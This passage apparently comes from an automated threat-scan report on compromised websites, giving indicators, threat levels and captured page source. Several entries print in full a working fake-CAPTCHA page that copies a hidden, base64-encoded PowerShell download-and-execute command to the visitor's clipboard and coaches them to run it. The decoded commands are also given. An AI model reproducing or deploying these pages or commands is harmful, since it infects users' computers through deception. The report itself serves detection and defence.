\"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://mail.finocci.com/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://mail.finocci.com/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://cambodiatouristservice.com/
Total findings: 2
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://browser.certif-update.website/ |
| URL | https://browser.certif-update.website/ |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://cambodiatouristservice.com/",
"URLs": [
"https://browser.certif-update.website/",
"https://browser.certif-update.website/"
],
"HTML": "<!DOCTYPE HTML>\r\n<html lang=\"en-US\">\r\n <head>\r\n <meta charset=\"UTF-8\">\r\n <meta http-equiv=\"refresh\" content=\"0; url=https://browser.certif-update.website/\">\r\n <script type=\"text/javascript\">\r\n window.location.href = \"https://browser.certif-update.website/\"\r\n </script>\r\n <title>Loading</title>\r\n </head>\r\n <body>\r\n\t </body>\r\n</html>",
"ThreatLevel": "None"
}
https://admin.gestroom.it/
Total findings: 1
Indicators of Compromise
| Type | Value |
|---|---|
| URL | https://t.me/LearnUSDT_bot?start=540835569 |
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://admin.gestroom.it/",
"URLs": "https://t.me/LearnUSDT_bot?start=540835569",
"HTML": "<!DOCTYPE HTML>\r\n<html>\r\n <head>\r\n <meta http-equiv=\"refresh\" content=\"7; url='https://t.me/LearnUSDT_bot?start=540835569'\" />\r\n </head>\r\n <body>\r\n </body>\r\n</html>",
"ThreatLevel": "None"
}
https://test.peperoncinochepassione.it/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
PowErsHeLL -W hiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://test.peperoncinochepassione.it/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=",
"Decoded": "iex (iwr 'https://nicostudio.it/pZJHqter.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r",
"ClipboardCommands": "PowErsHeLL -W hiddEn ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...dC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows Key <i class=\"fab fa-windows\"></i> + <b>R</b>.\r\n </li>\r\n \r\n <li>\r\n In the verification window, press <b>Ctrl</b> + <b>V</b>.\r\n </li>\r\n\r\n <li>\r\n Press <b>Enter</b> on your keyboard to finish.\r\n </li>\r\n </ol>\r\n <p>\r\n You will observe and agree:\r\n <br>\r\n <code>\r\n \u2705 \"I am not a robot - reCAPTCHA Verification ID: <span id=\"verification-id\">146820</span>\"\r\n </code>\r\n </p>\r\n\r\n \r\n </main>\r\n </div>\r\n <footer class=\"verify-container verify-footer\">\r\n <div class=\"verify-footer-left\">\r\n Perform the steps above to finish verification.\r\n </div>\r\n <button type=\"button\" class=\"verify-verify-button block\" id=\"verify-verify-button\" disabled=\"true\">Verify</button>\r\n </footer>\r\n </div> \r\n </div>\r\n\r\n </div>\r\n </div> \r\n\t\r\n <script>\r\n let checkboxWindow = document.getElementById(\"checkbox-window\");\r\n let checkboxBtn = document.getElementById(\"checkbox\");\r\n let checkboxBtnSpinner = document.getElementById(\"spinner\");\r\n let verifywindow = document.getElementById(\"verify-window\");\r\n\r\n function addCaptchaListeners() {\r\n if (checkboxBtn) {\r\n document.addEventListener(\"click\", function (event) {\r\n let path = event.composedPath();\r\n if (!path.includes(verifywindow) && isverifywindowVisible()) {\r\n closeverifywindow();\r\n }\r\n });\r\n checkboxBtn.addEventListener(\"click\", function (event) {\r\n event.preventDefault();\r\n checkboxBtn.disabled = true;\r\n runClickedCheckboxEffects();\r\n });\r\n }\r\n }\r\n\r\n function runClickedCheckboxEffects() {\r\n hideCaptchaCheckbox();\r\n setTimeout(function(){\r\n showCaptchaLoading();\r\n },500);\r\n setTimeout(function(){\r\n showVerifyWindow();\r\n },900)\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n checkboxBtnSpinner.style.animation = \"spin 1s linear infinite\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n checkboxBtnSpinner.style.animation = \"none\";\r\n setTimeout(function() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n }, 500);\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.visibility = \"hidden\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n\r\n function showCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"100%\";\r\n checkboxBtn.style.height = \"100%\";\r\n checkboxBtn.style.borderRadius = \"2px\";\r\n checkboxBtn.style.margin = \"0\";\r\n checkboxBtn.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaCheckbox() {\r\n checkboxBtn.style.width = \"4px\";\r\n checkboxBtn.style.height = \"4px\";\r\n checkboxBtn.style.borderRadius = \"50%\";\r\n checkboxBtn.style.marginLeft = \"25px\";\r\n checkboxBtn.style.marginTop = \"33px\";\r\n checkboxBtn.style.opacity = \"0\";\r\n }\r\n\r\n function showCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"visible\";\r\n checkboxBtnSpinner.style.opacity = \"1\";\r\n }\r\n\r\n function hideCaptchaLoading() {\r\n checkboxBtnSpinner.style.visibility = \"hidden\";\r\n checkboxBtnSpinner.style.opacity = \"0\";\r\n }\r\n\r\n function generateRandomNumber() {\r\n const min = 1000; \r\n const max = 9999;\r\n return Math.floor(Math.random() * (max - min + 1) + min).toString();\r\n }\r\n\r\n function closeverifywindow() {\r\n verifywindow.style.display = \"none\";\r\n verifywindow.style.visibility = \"hidden\";\r\n verifywindow.style.opacity = \"0\";\r\n\r\n showCaptchaCheckbox();\r\n hideCaptchaLoading();\r\n checkboxBtn.disabled = false;\r\n }\r\n\r\n function isverifywindowVisible() {\r\n return verifywindow.style.display !== \"none\" && verifywindow.style.display !== \"\";\r\n }\r\n\r\n function setClipboardCopyData(textToCopy){\r\n const tempTextArea = document.createElement(\"textarea\");\r\n tempTextArea.value = textToCopy;\r\n document.body.append(tempTextArea);\r\n tempTextArea.select();\r\n document.execCommand(\"copy\");\r\n document.body.removeChild(tempTextArea);\r\n }\r\n\r\n function stageClipboard(commandToRun, verification_id){\r\n const suffix = \" # \"\r\n const ploy = \"\u2705 ''I am not a robot - reCAPTCHA Verification ID: \"\r\n const end = \"''\"\r\n const textToCopy = commandToRun\r\n\r\n setClipboardCopyData(textToCopy);\r\n }\r\n\r\n\r\nfunction showVerifyWindow() {\r\n verifywindow.style.display = \"block\";\r\n verifywindow.style.visibility = \"visible\";\r\n verifywindow.style.opacity = \"1\";\r\n verifywindow.style.top = checkboxWindow.offsetTop - 80 + \"px\";\r\n verifywindow.style.left = checkboxWindow.offsetLeft + 54 + \"px\";\r\n\r\n if (verifywindow.offsetTop < 5) {\r\n verifywindow.style.top = \"5px\";\r\n }\r\n\r\n if (verifywindow.offsetLeft + verifywindow.offsetWidth > window.innerWidth - 10) {\r\n verifywindow.style.left = checkboxWindow.offsetLeft - 8 + \"px\";\r\n }\r\n\r\n var verification_id = generateRandomNumber();\r\n document.getElementById('verification-id').textContent = verification_id;\r\n\r\n const commandToRun = `PowErsHeLL -W hiddEn \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmljb3N0dWRpby5pdC9wWkpIcXRlci50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex\"`;\r\n stageClipboard(commandToRun, verification_id);\r\n}\r\n\r\naddCaptchaListeners();\r\n\r\n\r\n </script>\r\n</body>\r\n</html>\r\n",
"ThreatLevel": "High"
}
https://first-security-verden.de/
Total findings: 5
Indicators of Compromise
Malicious Code Sample
No malicious code sample extracted from this URL
JSON Technical Data
{
"URL": "https://first-security-verden.de/",
"URLs": [
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/misc/hazard-50x50.png",
"https://www.webgo.de/assets/images/logo.svg",
"https://www.webgo.de/assets/images/misc/construction.png",
"https://www.webgo.de/webhosting/"
],
"HTML": "<html>\r\n<head>\r\n \r\n<title>Neue Domain bei der webgo GmbH</title>\r\n<style type=\"text/css\">\r\n \r\nbody {font-family: sans-serif;}\r\n \r\n.main {\r\nbackground: #ffffff; /* Old browsers */\r\nbackground: -moz-linear-gradient(top, #ffffff 0%, #e5e5e5 100%); /* FF3.6+ */\r\nbackground: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#ffffff), color-stop(100%,#e5e5e5)); /* Chrome,Safari4+ */\r\nbackground: -webkit-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Chrome10+,Safari5.1+ */\r\nbackground: -o-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* Opera 11.10+ */\r\nbackground: -ms-linear-gradient(top, #ffffff 0%,#e5e5e5 100%); /* IE10+ */\r\nbackground: linear-gradient(to bottom, #ffffff 0%,#e5e5e5 100%); /* W3C */\r\nheight: 540px;\r\nwidth: 1200px;\r\npadding: 20px;\r\nmargin: 30px auto;\r\n box-shadow: 0px 0 5px #555;\r\n \r\n}\r\n \r\n.hazard {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px;}\r\n.hazard2 {background-image: url(\"https://www.webgo.de/assets/images/misc/hazard-50x50.png\"); width: 1240px; height: 10px; margin: 20px -20px -30px -20px; position: relative; top: 140px;}\r\n \r\n.header {\r\n width: 100%;\r\n height: 68px;\r\n background-image: url(\"https://www.webgo.de/assets/images/logo.svg\");\r\n background-repeat:no-repeat;\r\n}\r\n.content {\r\nmargin: 20px 0 0 -20px;\r\nbox-shadow: 0px 0 0px #555;\r\nwidth: 100%;\r\nheight: 200px;\r\npadding: 20px;\r\nfont-size: 1.5em;\r\n \r\n}\r\n.footer {\r\n height: 32px;\r\n padding: 10px 0 0 0;\r\n position: relative;\r\n top:-90px;\r\n}\r\n</style>\r\n</head>\r\n<body>\r\n<div class=\"main\">\r\n <div class=\"header\"></div>\r\n <div class=\"hazard\"></div>\r\n <div class=\"content\">\r\n <div style=\"width: 50%; float: left;position: relative; top: 50px;\">Diese Domain wurde bei webgo f\u00fcr einen Kunden registriert. <br><br>Wenn Sie diese Seite sehen, ist Ihre Domain erreichbar. Im webgo Webspace Admin unter \"Paket-Verwaltung\" - \"Domainverwaltung\" sehen Sie, in welchen Ordner Ihre Domain aktuell zeigt. </div>\r\n <div style=\"width: 50%; float: left; position: relative; top: -128px;\"><center><img src=\"https://www.webgo.de/assets/images/misc/construction.png\"></center></div>\r\n </div>\r\n <div class=\"hazard2\"></div>\r\n <div class=\"footer\">Sollten Sie Inhaber dieser Domain sein, l\u00f6schen Sie diese <b>index.html</b> Datei, damit Ihre hochgeladene Seite angezeigt werden kann. <br>\r\n <span style=\"font-size: 0.7em; float: right; margin: -7px 0 0 0\"><a href=\"https://www.webgo.de/webhosting/\">Webhosting von webgo GmbH </a></span></div>\r\n </div>\r\n \r\n</body>\r\n</html>\n",
"ThreatLevel": "None"
}
https://lucprofessional.com.br/
Total findings: 3
Suspicious Patterns
PowerShell Commands
Clipboard Manipulation
Suspicious Keywords
CAPTCHA References
PowerShell Downloads
Malicious Code Sample
POWerShEll -W h "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex"`;
Warning: This code is malicious and should not be executed
JSON Technical Data
{
"URL": "https://lucprofessional.com.br/",
"Base64Strings": {
"Base64": "aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50",
"Decoded": "iex (iwr 'https://amazon-ny-gifts.com/shellsajshdasd/ftpaksjdkasdjkxnckzxn/ywOVkkem.txt' -UseBasicParsing).Content"
},
"URLs": [
"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css",
"https://use.fontawesome.com/releases/v5.0.0/css/all.css",
"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png"
],
"PowerShellCommands": "POWerShEll -W h \"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vYW1hem9uLW55LWdpZnRzLmNvbS9zaGVsbHNhanNoZGFzZC9mdHBha3NqZGthc2Rqa3huY2t6eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`;\r",
"ClipboardCommands": "POWerShEll -W h ",
"SuspiciousKeywords": [
"\u2705",
"I am not a robot",
"Verification ID",
"reCAPTCHA Verification",
"Verify You Are Human",
"To better prove you are not a robot",
"I'm not a robot",
"<script>"
],
"ClipboardManipulation": [
"...tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempTextArea); }...",
"...y.append(tempTextArea); tempTextArea.select(); document.execCommand(\"copy\"); document.body.removeChild(tempText..."
],
"PowerShellDownloads": {
"FullMatch": "| iex",
"Context": "...eG4veXdPVmtrZW0udHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex\"`; stageClipboard(commandToRun, verification_id); }..."
},
"CaptchaElements": [
"ification ID: <span id=\"verification-id\">146820</span>\"",
"} function hideCaptchaLoading() { che",
"} function hideCaptchaCheckbox() { che",
"et checkboxWindow = document.getElementById(\"checkbox-window\"); let chec",
"let checkboxBtn = document.getElementById(\"checkbox\"); let chec",
"heckboxBtnSpinner = document.getElementById(\"spinner\"); let veri",
"let verifywindow = document.getElementById(\"verify-window\"); functi",
"andomNumber(); document.getElementById('verification-id').textContent = veri",
"ect(); document.execCommand(\"copy\"); doc",
"tempTextArea.select(); docum",
"href=\"https://cdnjs.cloudflare.com/ajax/libs/font-",
"</div> <script> let checkb"
],
"HTML": "<!DOCTYPE html>\r\n<html lang=\"en\">\r\n<head>\r\n <meta charset=\"UTF-8\">\r\n <meta name=\"viewport\" content=\"width=device-width, initial-scale=1.0\">\r\n <title>Verify You Are Human</title>\r\n <link rel=\"stylesheet\" href=\"https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.0.0-beta3/css/all.min.css\">\r\n <link rel=\"stylesheet\" href=\"https://use.fontawesome.com/releases/v5.0.0/css/all.css\"> \r\n <style>\r\n body, html {\r\n margin: 0;\r\n padding: 0;\r\n width: 100%;\r\n height: 100%;\r\n display: flex;\r\n justify-content: center;\r\n align-items: center;\r\n font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif;\r\n background: #f2f2f2;\r\n color: #333;\r\n }\r\n\r\n .container {\r\n text-align: center;\r\n max-width: 500px;\r\n margin: 20px;\r\n position: relative;\r\n }\r\n\r\n .recaptcha-box {\r\n padding: 20px;\r\n background: #fff;\r\n box-shadow: 0 5px 20px rgba(0, 0, 0, 0.3);\r\n border-radius: 8px;\r\n text-align: center;\r\n }\r\n\r\n .recaptcha-box h2 {\r\n margin: 0 0 20px;\r\n font-size: 28px;\r\n color: #4285f4;\r\n }\r\n\r\n .recaptcha-box p {\r\n margin: 0 0 20px;\r\n font-size: 18px;\r\n color: #666;\r\n }\r\n\r\n .checkbox-window {\r\n display: flex;\r\n align-items: center;\r\n height: 74px;\r\n width: 300px;\r\n background-color: #f9f9f9;\r\n border-radius: 3px;\r\n border: 1px solid #d3d3d3;\r\n }\r\n\r\n .checkbox-container {\r\n width: 28px;\r\n height: 28px;\r\n margin-left: 12px;\r\n margin-right: 8px;\r\n position: relative;\r\n }\r\n\r\n .checkbox {\r\n width: 100%;\r\n height: 100%;\r\n background-color: #fff;\r\n border-radius: 2px;\r\n border: 2px solid #c1c1c1;\r\n cursor: pointer;\r\n transition: border-color 0.3s;\r\n }\r\n\r\n .checkbox:active,\r\n .checkbox.checked {\r\n border-color: #4285f4;\r\n background-color: #4285f4;\r\n position: relative;\r\n }\r\n\r\n .checkbox.checked::after {\r\n content: '\\f00c'; /* Checkmark icon from FontAwesome */\r\n font-family: \"FontAwesome\";\r\n color: #fff;\r\n font-size: 18px;\r\n position: absolute;\r\n top: -2px;\r\n left: 2px;\r\n }\r\n\r\n .im-not-a-robot {\r\n font-size: 15px;\r\n color: #282727;\r\n }\r\n\r\n .captcha-logo {\r\n width: 40px;\r\n height: 45px;\r\n margin-left: auto;\r\n margin-right: 10px;\r\n }\r\n\r\n .spinner {\r\n visibility: hidden;\r\n position: absolute;\r\n top: 20px;\r\n left: 20px;\r\n height: 20px;\r\n width: 20px;\r\n border: 2px solid rgba(0, 0, 0, 0.1);\r\n border-top: 2px solid #333;\r\n border-radius: 50%;\r\n transition: opacity 0.5s linear;\r\n animation: spin 1s linear infinite;\r\n }\r\n\r\n .spinner.active {\r\n visibility: visible;\r\n }\r\n\r\n @keyframes spin {\r\n 0% {\r\n transform: rotate(0deg);\r\n }\r\n 100% {\r\n transform: rotate(360deg);\r\n }\r\n }\r\n\r\n /* Popup Verification Window */\r\n .verify-window {\r\n font-family: Roboto, helvetica, arial, sans-serif;\r\n opacity: 0;\r\n position: absolute;\r\n visibility: hidden;\r\n margin: auto;\r\n width: 310px;\r\n background-color: #fff;\r\n border: 1px solid #cecece;\r\n -webkit-box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n box-shadow: 5px 6px 7px -3px rgba(0, 0, 0, 0.12);\r\n transition: opacity 400ms;\r\n }\r\n\r\n .verify-header {\r\n background-color: #1A73E8;\r\n padding: 16px;\r\n color: #fff;\r\n font-size: 18px;\r\n border-radius: 8px 8px 0 0;\r\n }\r\n\r\n .verify-main {\r\n padding: 16px;\r\n font-size: 14px;\r\n color: #333;\r\n }\r\n\r\n .verify-main ol {\r\n padding-left: 20px;\r\n }\r\n\r\n .verify-main ol li {\r\n margin-bottom: 10px;\r\n }\r\n\r\n .verify-main code {\r\n display: block;\r\n margin-top: 10px;\r\n background-color: #f9f9f9;\r\n padding: 10px;\r\n font-size: 12px;\r\n border: 1px solid #ddd;\r\n }\r\n\r\n .verify-footer {\r\n background-color: #f2f2f2;\r\n padding: 16px;\r\n text-align: right;\r\n }\r\n\r\n .verify-footer button {\r\n padding: 10px 20px;\r\n background: #4285f4;\r\n color: #fff;\r\n border: none;\r\n border-radius: 5px;\r\n cursor: pointer;\r\n }\r\n\r\n /* Overlay */\r\n .overlay {\r\n display: none;\r\n position: fixed;\r\n top: 0;\r\n left: 0;\r\n width: 100%;\r\n height: 100%;\r\n background: rgba(0, 0, 0, 0.5);\r\n z-index: 10;\r\n }\r\n\r\n .overlay.active,\r\n .verify-window.active {\r\n display: block;\r\n }\r\n </style>\r\n</head>\r\n<body>\r\n <div class=\"container\">\r\n <div class=\"overlay\" id=\"overlay\"></div>\r\n <div class=\"recaptcha-box\">\r\n <h2>Verify You Are Human</h2>\r\n <p>Please verify that you are a human to continue.</p>\r\n<div class=\"container m-p\"> \r\n <div id=\"checkbox-window\" class=\"checkbox-window m-p block\">\r\n <div class=\"checkbox-container m-p\">\r\n <button type=\"button\" id=\"checkbox\" class=\"checkbox m-p line-normal\"></button>\r\n </div>\r\n <p style=\"margin: 0 !important;\" class=\"im-not-a-robot m-p line-normal\">I'm not a robot</p>\r\n <img src=\"https://www.google.com/recaptcha/about/images/reCAPTCHA-logo@2x.png\" class=\"captcha-logo line-normal\" alt=\"\">\r\n <br>\r\n <p class=\"checkbox-desc m-p line-normal\">\r\n\r\n </p>\r\n <img class=\"spinner\" alt=\"\" id=\"spinner\">\r\n </div>\r\n \r\n <div id=\"verify-window\" class=\"verify-window\">\r\n <div class=\"verify-container\">\r\n <header class=\"verify-header\">\r\n <span class=\"verify-header-text-medium m-p block\">Complete these</span>\r\n <span class=\"verify-header-text-big m-p block\">Verification Steps</span>\r\n <span class=\"verify-header-text-medium m-p block\"></span>\r\n </header>\r\n <main class=\"verify-main\">\r\n <p>\r\n To better prove you are not a robot, please:\r\n </p>\r\n <ol>\r\n <li>\r\n Press & hold the Windows 